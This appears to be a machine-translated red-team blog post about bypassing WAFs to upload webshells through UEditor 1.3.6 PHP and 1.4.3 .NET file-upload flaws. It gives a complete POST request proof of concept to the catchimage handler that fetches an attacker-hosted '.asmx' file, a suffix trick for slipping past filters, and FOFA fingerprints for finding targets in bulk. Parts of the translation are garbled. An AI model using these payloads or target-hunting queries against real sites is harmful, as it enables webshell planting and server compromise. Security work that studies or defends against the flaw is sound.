Original | ueditor1.4.3-asmx bypasses WAF

Preface : During this period of time, I always encounter ueditor, Some time ago hvv Some red teams also get it through this shell, Talk about uploading the editor

Last night, , A friend in the group sent a ueditor Editor upload , In short, he bypassed the image restrictions ,ueditor Parsing url yes ip The format of ,, Dan Chuan webshell Always 403, I also touched ,, Summed up some reasons

If ueditor Uploading the directory can parse the script , It's just simple waf If intercepted :

bypass： poc:jpg?.a?s?m?x

First to speak ueditor1.4.3 This editor vulnerability ,18 Year out net Format upload , The versions that can be uploaded and bypassed are
ueditor/ 1.4.3 net
ueditor/ 1.3.6 net( The actual test doesn't work )
ueditor/ 1.3.6 php

1.3.6 Environment bypass :
Parsing vulnerabilities
ueditor 1.3.6 X-Powered-By: ThinkPHP + apache( Line feed resolution and suffix resolution )

The above environment can bypass file uploading locally

0x00 1.3.6 Upload

Upload files Uploader.class.php 192 That's ok , The file suffix consists of $fileName = $format.$ext; control ,
226 That's ok ,$ext Out of control

private function getFileExt()
{
    return strtolower( strrchr( $this->file[ "name" ] , '.' ) );
}

but 1.3.6 File naming introduces format This function
And in the imageUp.php in 30-35 OK, it defines format The function is direct post The ginseng , This place is controllable ,

Actual demonstration poc:
to format Pass in the parameter , coordination apache Parsing vulnerabilities , For example, incoming 1, You can customize the file header

0x02. 1.4.3net Version file upload

This version is in hvv I often meet , But it's really hard to use ,,
1. The upload interface should be accessible , Not blocked by policy ,
2. Whether uploading can bypass image,
3. Upload directory script parsing strategy ((2022 Most of the year ueditor Have made strategies ))

There are probably 10 To a ueditor standing , Most of them have server script parsing .

Case study 1: Help group friends watch the station

Upload aspx success , But visit 403, Upload defective aspx Code , Report an error but return 200

I don't know why , I think it may be the problem of blacklist , Tested ashx、asmx And so on , I don't think the server is regular

google Passive collection found a ueditor, The fingerprint (iis7.5 asp.net) Site testing , It is found that the upload directory prohibits the execution of script files

=========================================
2022 Years. ,google Passive information collection of real chicken ribs , Most of them can only be used as entry points for detecting sensitive information ,
google Measured 5-6 Individual station , Most of the results collected by the station can't play ,, Or turn fofa Active collection ,
A fingerprint : app=“ Baidu -UEditor” && server=“Microsoft-IIS/7.5”
It turned out pretty well , After a wave of testing ,

backhand admin admin
The results of the collection exist in the secondary directory ueditor Editor Directory

Put on ueditor Upload files poc

POST /resources/htmleditor/net/controller.ashx?action=catchimage&encode=utf-8 HTTP/1.1
Host: rhost:rport
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: zh-CN,zh;q=0.9
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 53

source%5B%5D=http://ip:port/asmxx.jpg?.asmx

Put it here tool Bypass waf Of poc:jpg?.a?s?m?x

See upload successful , Back to the topic just now : Whether the uploaded directory can parse the script ？
asmx yes asp.net adopt SOAP The protocol generates and sends messages . Probability can bypass regularity ,

summary :

1.ueditor 1.4.3 It is usually difficult to bypass the uploading of files on the master site ,403, Most of the people who come out of the hole are C paragraph ,
2. Surveying and mapping batch collection ueditor The assets of the ,